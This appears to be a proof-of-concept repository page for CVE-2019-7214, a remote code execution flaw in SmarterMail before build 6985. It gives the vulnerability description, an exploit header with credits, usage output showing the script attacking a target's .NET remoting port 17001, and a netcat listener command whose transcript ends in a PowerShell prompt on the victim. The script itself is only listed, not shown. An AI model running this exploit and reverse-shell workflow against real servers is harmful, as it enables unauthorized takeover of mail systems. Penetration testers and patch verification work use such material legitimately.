CVE-2019-7214 PoC — SmarterTools SmarterMail Code Issue Vulnerability

Source
Associated Vulnerability
Title: SmarterTools SmarterMail Code Issue Vulnerability (CVE-2019-7214)
Description: SmarterTools SmarterMail 16.x before build 6985 allows deserialization of untrusted data. An unauthenticated attacker could run commands on the server when port 17001 was remotely accessible. This port is not accessible remotely by default after applying the Build 6985 patch.
Description
Python3 Rewrite of SmarterMail < Build 6985 Remote Code Execution found by 1F98D (CVE-2019-7214)
Readme
## CVE-2019-7214
```
# Exploit Title: SmarterMail < Build 6985 Remote Code Execution
# Exploit Author: 1F98D
# Original Author: Soroush Dalili
# Modified Author: Drew Alleman
# Date: 10 May 2020
# Vendor Homepage: https://www.smartertools.com/
# CVE: CVE-2019-7214
# Tested on: Windows 10 x64
# References:
# https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
# 
# SmarterMail before build 6985 provides a .NET remoting endpoint
# which is vulnerable to a .NET deserialisation attack.
```

## Usage
### Sending the Exploit
```
$ python3 CVE-2019-7214.py -l 192.168.45.215 -r  192.168.111.65
[*] Attacking: tcp://192.168.111.65:17001/Servers
[*] Attempting to send exploit...
[*] Exploit sent! Check your shell at 192.168.45.215:4444
```

### Creating the Listener
NOTE: You will have to press enter once you see the `connect to xxx` message to actually start the shell. 
```
$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.111.65] 49788

PS C:\Windows\system32> 
```
File Snapshot

```
[4.0K] /data/pocs/32e446d9ec8147f469eec739f2213add5f5c96dd
├── [9.3K] CVE-2019-7214.py
└── [1.0K] README.md

0 directories, 2 files
```